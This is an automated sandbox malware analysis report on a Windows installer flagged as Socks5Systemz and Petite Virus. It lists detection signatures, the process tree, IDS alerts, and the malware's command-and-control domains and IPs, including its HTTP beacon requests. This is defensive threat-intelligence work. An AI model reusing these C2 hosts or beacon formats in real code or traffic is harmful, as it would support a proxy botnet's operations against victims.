Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mg5bMQ2lWi.exe

Overview

General Information

Sample name:Mg5bMQ2lWi.exe
renamed because original name is a hash value
Original sample name:7700eba1ceaa134b1da16d1ede0e7894.exe
Analysis ID:1575254
MD5:7700eba1ceaa134b1da16d1ede0e7894
SHA1:d591222916193a3bcaef009eae37fc60acbff924
SHA256:87324fceb64682470429276f1766671ad250163a2404b7b7df6f4d25007a1df0
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Mg5bMQ2lWi.exe (PID: 4504 cmdline: "C:\Users\user\Desktop\Mg5bMQ2lWi.exe" MD5: 7700EBA1CEAA134B1DA16D1EDE0E7894)
    • Mg5bMQ2lWi.tmp (PID: 2200 cmdline: "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 2108 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 6008 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: A158C99AA92F0E29ED84BB25976D4F7A)
      • net.exe (PID: 6688 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6996 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 5824 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: A158C99AA92F0E29ED84BB25976D4F7A)
  • cleanup
{"C2 list": ["gdpkvkr.com"]}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: crtgame.exe PID: 5824JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T00:53:05.470412+010020494671A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-15T00:53:18.604536+010020494671A Network Trojan was detected192.168.2.44976494.232.249.18780TCP
                  2024-12-15T00:53:31.870192+010020494671A Network Trojan was detected192.168.2.44979094.232.249.18780TCP
                  2024-12-15T00:53:50.705539+010020494671A Network Trojan was detected192.168.2.449847185.237.206.12980TCP
                  2024-12-15T00:53:54.522921+010020494671A Network Trojan was detected192.168.2.449847185.237.206.12980TCP
                  2024-12-15T00:53:56.045459+010020494671A Network Trojan was detected192.168.2.449860185.237.206.12980TCP
                  2024-12-15T00:53:57.696443+010020494671A Network Trojan was detected192.168.2.449866185.237.206.12980TCP
                  2024-12-15T00:53:59.329963+010020494671A Network Trojan was detected192.168.2.449872185.237.206.12980TCP
                  2024-12-15T00:54:00.858930+010020494671A Network Trojan was detected192.168.2.449875185.237.206.12980TCP
                  2024-12-15T00:54:02.418389+010020494671A Network Trojan was detected192.168.2.449880185.237.206.12980TCP
                  2024-12-15T00:54:04.014737+010020494671A Network Trojan was detected192.168.2.449885185.237.206.12980TCP
                  2024-12-15T00:54:05.707108+010020494671A Network Trojan was detected192.168.2.449889185.237.206.12980TCP
                  2024-12-15T00:54:07.245777+010020494671A Network Trojan was detected192.168.2.449894185.237.206.12980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-15T00:53:05.470412+010020494681A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-15T00:53:18.604536+010020494681A Network Trojan was detected192.168.2.44976494.232.249.18780TCP
                  2024-12-15T00:53:31.870192+010020494681A Network Trojan was detected192.168.2.44979094.232.249.18780TCP
                  2024-12-15T00:53:50.705539+010020494681A Network Trojan was detected192.168.2.449847185.237.206.12980TCP
                  2024-12-15T00:53:54.522921+010020494681A Network Trojan was detected192.168.2.449847185.237.206.12980TCP
                  2024-12-15T00:53:56.045459+010020494681A Network Trojan was detected192.168.2.449860185.237.206.12980TCP
                  2024-12-15T00:53:57.696443+010020494681A Network Trojan was detected192.168.2.449866185.237.206.12980TCP
                  2024-12-15T00:53:59.329963+010020494681A Network Trojan was detected192.168.2.449872185.237.206.12980TCP
                  2024-12-15T00:54:00.858930+010020494681A Network Trojan was detected192.168.2.449875185.237.206.12980TCP
                  2024-12-15T00:54:02.418389+010020494681A Network Trojan was detected192.168.2.449880185.237.206.12980TCP
                  2024-12-15T00:54:04.014737+010020494681A Network Trojan was detected192.168.2.449885185.237.206.12980TCP
                  2024-12-15T00:54:05.707108+010020494681A Network Trojan was detected192.168.2.449889185.237.206.12980TCP
                  2024-12-15T00:54:07.245777+010020494681A Network Trojan was detected192.168.2.449894185.237.206.12980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Mg5bMQ2lWi.exeAvira: detected
                  Source: crtgame.exe.5824.6.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["gdpkvkr.com"]}
                  Source: Mg5bMQ2lWi.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack
                  Source: Mg5bMQ2lWi.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-OGODD.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-1CHIA.tmp.1.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49790 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49790 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49847 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49847 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49860 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49860 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49875 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49872 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49872 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49875 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49894 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49894 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49889 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49889 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49866 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49866 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49764 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49880 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49880 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49764 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49885 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49885 -> 185.237.206.129:80
                  Source: Malware configuration extractorURLs: gdpkvkr.com
                  Source: global trafficTCP traffic: 192.168.2.4:49851 -> 89.105.201.183:2023
                  Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
                  Source: Joe Sandbox ViewIP Address: 94.232.249.187 94.232.249.187
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                  Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 152.89.198.214
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C22B95 WSASetLastError,WSARecv,WSASetLastError,select,6_2_02C22B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: bodotpd.com
                  Source: global trafficDNS traffic detected: DNS query: gdpkvkr.com
                  Source: crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde
                  Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde
                  Source: crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/en-US
                  Source: crtgame.exe, 00000006.00000002.2945587982.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2
                  Source: is-OMKRE.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
